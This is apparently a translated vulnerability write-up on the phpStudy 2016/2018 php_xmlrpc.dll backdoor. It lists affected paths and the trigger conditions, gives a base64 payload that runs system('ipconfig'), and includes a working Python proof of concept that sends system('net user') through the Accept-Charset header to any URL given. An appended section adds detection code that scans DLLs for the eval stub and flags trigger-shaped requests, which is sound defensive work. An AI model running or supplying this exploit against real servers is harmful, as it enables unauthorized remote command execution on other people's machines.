Affected versions:
- phpStudy2016
  - php\php-5.2.17\ext\php_xmlrpc.dll
  - php\php-5.4.45\ext\php_xmlrpc.dll
- phpStudy2018
  - PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
  - PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
Precondition:
- php_xmlrpc.dll is loaded, and the file contains the stub @eval(%s('%s'))
Verification:
- In Accept-Encoding, remove the space after the comma in "gzip, deflate" (send "gzip,deflate"); otherwise the command does not execute.
- The value of Accept-Charset is the command to execute; it must be base64-encoded.
- Constructed payload:
  // executes system('ipconfig') ; Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpIDs=
Verification script:
# -*- coding: utf-8 -*-
import base64
import sys

import requests


def Poc(ip):
    # Command body to smuggle through Accept-Charset; the backdoor base64-decodes and evals it.
    payload = "echo \"hello phpstudy\";"
    # Pre-encoded form of: echo system("net user");
    poc = "ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7"
    pay = base64.b64encode(payload.encode("utf-8"))
    # poc = str(pay, "utf-8")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Connection": "close",
        # No space after the comma, otherwise the backdoor does not trigger.
        "Accept-Encoding": "gzip,deflate",
        "Accept-Charset": poc,
        "Upgrade-Insecure-Requests": "1",
    }
    url = ip
    r = requests.get(url, headers=headers)
    # print(r.text)
    # The original test `"Administrator" or "DefaultAccount" in r.text` was always true;
    # each substring has to be checked against the response body separately.
    if "Administrator" in r.text or "DefaultAccount" in r.text:
        print("存在phpstudy后门")
    else:
        print("不存在phpstudy后门")


if len(sys.argv) < 2:
    print("python phpstudy.py http://127.0.0.1")
else:
    Poc(sys.argv[1])
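Two defender-side checks for the backdoor described above, written here as an added example that is not part of the original write-up: a file scan for the @eval(%s('%s')) stub the page names as the fingerprint inside php_xmlrpc.dll, and a request-header check for the trigger shape (Accept-Encoding exactly "gzip,deflate" plus an Accept-Charset that base64-decodes to PHP) that can be run over web-server access logs. The function names and the PHP-call regex heuristic are my own assumptions, not anything from phpStudy.

```python
import base64
import re
import sys

# Eval stub the write-up names as the backdoor's fingerprint inside php_xmlrpc.dll.
BACKDOOR_MARKER = b"@eval(%s('%s'))"

# Loose shape of a PHP function call, e.g. system('ipconfig'), in a decoded header value.
# This is a heuristic of my own, not a signature from the original report.
PHP_CALL = re.compile(r"\b[A-Za-z_]\w*\s*\(")


def dll_has_backdoor_marker(data: bytes) -> bool:
    """True if the raw DLL bytes contain the @eval(%s('%s')) stub."""
    return BACKDOOR_MARKER in data


def scan_dll_file(path: str) -> bool:
    """Read a php_xmlrpc.dll from disk and check it for the marker."""
    with open(path, "rb") as f:
        return dll_has_backdoor_marker(f.read())


def decode_charset_header(value: str):
    """Base64-decode an Accept-Charset value; None if it is not valid base64/UTF-8.

    Real charset names ('utf-8', 'ISO-8859-1,utf-8;q=0.7') fail strict base64
    validation, which is what separates them from a smuggled command."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueError subclasses
        return None


def is_backdoor_trigger(headers: dict) -> bool:
    """Flag a request with the trigger shape described above: Accept-Encoding exactly
    'gzip,deflate' (no space after the comma) and an Accept-Charset that decodes to PHP."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("accept-encoding", "").strip() != "gzip,deflate":
        return False
    decoded = decode_charset_header(h.get("accept-charset", ""))
    return decoded is not None and PHP_CALL.search(decoded) is not None


if __name__ == "__main__":
    # Usage: python check_xmlrpc.py path\to\php_xmlrpc.dll [...]
    for dll_path in sys.argv[1:]:
        print(dll_path, "BACKDOOR MARKER FOUND" if scan_dll_file(dll_path) else "clean")
```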